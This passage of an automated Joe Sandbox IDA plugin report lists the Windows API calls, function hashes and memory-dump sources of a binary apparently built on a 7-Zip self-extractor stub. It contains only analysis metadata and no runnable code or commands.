                          • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                          • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                          • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                          • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                          APIs
                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                          • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                          • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                          • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                          APIs
                          • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: FileTime
                          • String ID:
                          • API String ID: 1425588814-0
                          • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                          • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                          • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                          • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000060,?,?,00000000,?,0040D96E,00000000,?,00000000,00000000,000000FF,?,00000001,?,?,?), ref: 0040D91A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                          • Instruction ID: 1ceb60bf2594cd826c4dcd58ac8a3e75a9726935558582f6c117c88f0dd7e0c4
                          • Opcode Fuzzy Hash: 8955cc1b29c93d01701bbb2481471dd0eaf8a49c35f18cc8a7d41221c9f85a6f
                          • Instruction Fuzzy Hash: 4A219372A042858FCF30FF91D98096B77A5AF50358320853FE093732C1DA38AD49D75A
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                          • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                          • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                          • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                          • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                          • Opcode Fuzzy Hash: a7abc97568459436273e1f083447e626332fd1c69ee6784c82a7404474e7416c
                          • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                          APIs
                          • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                          • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                          • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                          • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                          • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                          • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                          • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                          APIs
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                          • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                          • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                          • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                          • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                          • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                          • Instruction Fuzzy Hash:
                          APIs
                          • _wtol.MSVCRT ref: 004034E5
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                          • _wtol.MSVCRT ref: 0040367F
                          • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                          • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                          • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                          • String ID: .lnk
                          • API String ID: 408529070-24824748
                          • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                          • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                          • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                          • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                          APIs
                          • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                          • wsprintfW.USER32 ref: 00401FFD
                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                          • GetLastError.KERNEL32 ref: 00402017
                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                          • GetLastError.KERNEL32 ref: 0040204C
                          • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                          • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                          • SetLastError.KERNEL32(00000000), ref: 00402098
                          • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                          • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                          • _wtol.MSVCRT ref: 0040212A
                          • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                          • String ID: 7zSfxString%d$XpA$\3A
                          • API String ID: 2117570002-3108448011
                          • Opcode ID: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                          • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                          • Opcode Fuzzy Hash: 548ade176c921e3c89d1731ce67e310a71d7e7a73203bdbbb6ff14cd1b9bb65a
                          • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                          • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                          • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                          • LockResource.KERNEL32(00000000), ref: 00401C41
                          • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                          • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                          • wsprintfW.USER32 ref: 00401C95
                          • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                          • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                          • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                          • API String ID: 2639302590-365843014
                          • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                          • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                          • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                          • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                          APIs
                          • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                          • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                          • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                          • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                          • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                          • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                          • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                          • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                          • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                          • String ID:
                          • API String ID: 829399097-0
                          • Opcode ID: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                          • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                          • Opcode Fuzzy Hash: a8862aa27d5a6cc2b1ba12d709e13e5df444902fd3bed4afc67f02113c073308
                          • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                          • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                          • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                          • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                          • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                          • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                          • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                          • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                          • String ID:
                          • API String ID: 1862581289-0
                          • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                          • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                          • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                          • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                          APIs
                          • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                          • GetWindow.USER32(?,00000005), ref: 00406D8F
                          • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Window$AddressLibraryLoadProc
                          • String ID: SetWindowTheme$\EA$uxtheme
                          • API String ID: 324724604-1613512829
                          • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                          • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                          • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                          • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                          • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                          • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                          • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
